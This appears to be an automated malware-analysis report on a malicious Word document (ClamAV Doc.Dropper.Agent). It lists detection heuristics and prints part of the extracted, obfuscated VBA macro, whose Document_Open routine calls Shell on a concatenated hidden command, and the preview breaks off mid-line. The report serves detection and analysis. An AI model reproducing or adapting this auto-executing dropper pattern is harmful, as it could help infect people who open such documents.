MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6616613-0. Static analysis revealed the presence of VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates the macro is designed to execute external commands, likely to download and run a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of the specific commands or URLs used.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6616613-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6616613-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53046 bytes |
SHA-256: 6692cda462aaa2738ce8e1f25d3270e4638314eb60e93b4c94214736b5bc0c6e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LjRpninnAwGiIj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function SvlwRVJiLq()
On Error Resume Next
GjYccm = (96880 - ZtiGLf / hLFoX - uCjar - (68923 + wKLKQ + BDzfr / QUWlDn))
QrwYa = (14253 - ViVhq / CppGcU - WzEzSG - (66205 + iqiBU + OwSjTq / wqzNuw))
AtnLzm = (46884 - ioCkC / zPhYqC - OijOEH - (10020 + QfmGF + EWALi / pYKdGh))
UXiWhh = (35885 - BFUYLm / qjWVnt - ZJdwa - (13885 + jXITW + Svimu / JRbzRo))
HEfzi = (99856 - LGwuiT / OIPizp - sjNLRo - (80294 + DIXlj + LAoYF / sQDQz))
End Function
Private Function wIXhGnoCjoX()
On Error Resume Next
GWclNO = (30328 - JWpLt / LlwdfU - zGXCv - (29471 + AIFoV + vaiWzw / jDZwnt))
TQFLNt = (86404 - clBuA / bzGPRK - BLzkiC - (71274 + PHhwnV + dwCBjN / TsjaHC))
fwQjjC = (1305 - HKFHUA / UvvrJY - bUWrvJ - (89648 + stELzK + aTVXo / zSZlnv))
pMRwRF = (10250 - jqHiMi / vNcvW - MQilL - (84981 + ADviz + RVhqE / XXTKYi))
qPCQz = (27056 - QEjSz / QBRBq - wkHcih - (67424 + vhaPCF + KtCYVj / KZnhzZ))
tjIZAX = (92516 - rHrsV / MCJBi - UcWlj - (78975 + BzGINM + zNwlw / ERbNjv))
HvwzL = (39351 - nYiQfL / iUQtNF - PdULK - (50643 + oziJPu + fSEtd / FdpEEd))
End Function
Private Function oNfHTpcvnL()
On Error Resume Next
FAHzj = (62267 - QcAaJZ / GdpWKt - PqGXvD - (27584 + IGGAj + IiDZH / GiimL))
wwPqiI = (81527 - oPqdiH / NDMZrf - cGMWRK - (76915 + XsEDz + sVqrA / fnRFuz))
wafvZ = (63347 - MwNXXU / ltFFCh - iMqQa - (58152 + pZuizN + wnPwB / cZapHn))
DEINp = (11500 - pJAZn / hJTtUI - LwzmzD - (61389 + kIULsh + CAtRv / jzddl))
iqhJX = (18787 - OpfwC / WZTsY - YoGqG - (453 + bIlAIn + XHiMV / DKhzjA))
zLoSDK = (18178 - FVPla / EAfOuv - HSACN - (64569 + wVILZA + ZTCHiY / widfU))
End Function
Private Sub Document_open()
On Error Resume Next
zStrL = (93485 - roCUPv / avNPG - mKtcJm - (75193 + oLtOsG + ELtoKX / TKaCUS))
MHYbj = (74877 - RiYJo / dJGXo - WkUbw - (38961 + qiCGS + ccwlp / XIfuK))
MIAMp = (60831 - KMWwKd / YNGIm - UhVivI - (61724 + SciaY + EzRpB / aAiPs))
fBZFU = (27826 - linRQ / zisjnV - LwawRH - (53443 + TzGqF + AzsXO / AjZKz))
Shell "" + XpATffIzbsfc + wqObFoMbfX + CVar("c") + RBqpJLul + hianMdA + jjXAVw + GVNPKra + najLwBrK + ZtzGmqUjd + pwnAdOh + CFaRqrZnSwl + msGjo + kzVAqBbPmDz + jNHpi + wwIbNjUzB + iqvojz + wbNzF + wJMRlwtjA + AZbjsQf + btdDBFmzbc + AYWBFzTTbuY + GrSRazRJszB + PIfTkFR + wcvSuwTcE + qUzWlmPS + qJMvr + lICGVfSIqT + IqUtqSm + rIwbXDsh + nMmPRfjbKdz, 0
LYJlfY = (31111 - smRQLA / TCKTYP - BZlPud - (47227 + rLIIn + NRNIK / vaVwFi))
End Sub
Private Function CiwtsuRXMvNpsI()
On Error Resume Next
ZoUVR = (25877 - qIRcXj / EjGSM - fKJiO - (68219 + LAzfT + LfzvR / bYfvzp))
pksKo = (9472 - LhXia / tCTun - urzlzq - (75075 + OzJXsB + LAhRKz / nMVLq))
nRRhi = (94044 - lPflH / naqKlJ - YsGop - (68440 + pzOMtK + lujQAW / aPSJJ))
suuFR = (23219 - qztTBZ / NYApZ - hBldct - (54058 + mPnAo + WDORb / LVBozJ))
End Function
Private Function SfLkbWjA()
On Error Resume Next
PjbBV = (77438 - ZOzsT / PKunSN - HdJdS - (14994 + bbiow + kiTmi / XqwKnF))
dwPzW = (81761 - aPUiUk / Rjzquo - aILwOL - (91121 + oPuSi + zCEtB / icXfj))
mYivFH = (6183 - bFlzK / jpbDm - PbQGY - (61732 + YLjdQz + YHQiQq / RbCWU))
wrYDm = (6816 - DnEDH / EWbEoC - bTdtz - (87302 + OzlfMP + wLPMHO / DJwBl))
ACFGpd = (41268 - mWzjN / hzjIv - OhrHE - (69154 + UJTWYj + PYWYz / tUwwp))
AmvfOG = (27338 - HXWZK / CubUzj - bYznvH - (96608 + NkDLz + YlzCr / NztIq))
wIBai = (19443 - iTLwCF / AFSAZA - IIaKJb - (20619 + kuSEPr + IsrND / wNXWth))
End Function
Private Function plMjChuLdsvLTl()
On Error Resume Next
RTZDjm = (91055 - zAwkvL / tlltMm - dvWIau - (89155 + HvSZBa + WcVOPw / QHkab))
szDCj = (13713 - kmowdn / fiwsKd - NHwrjG - (45153 + LtoOz + MzlQi / ctOiRX))
hnHLop = (58024 - aLAiMs / RVJWF - JYwWf - (22648 + OYATzw + ILONk / qBJN
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.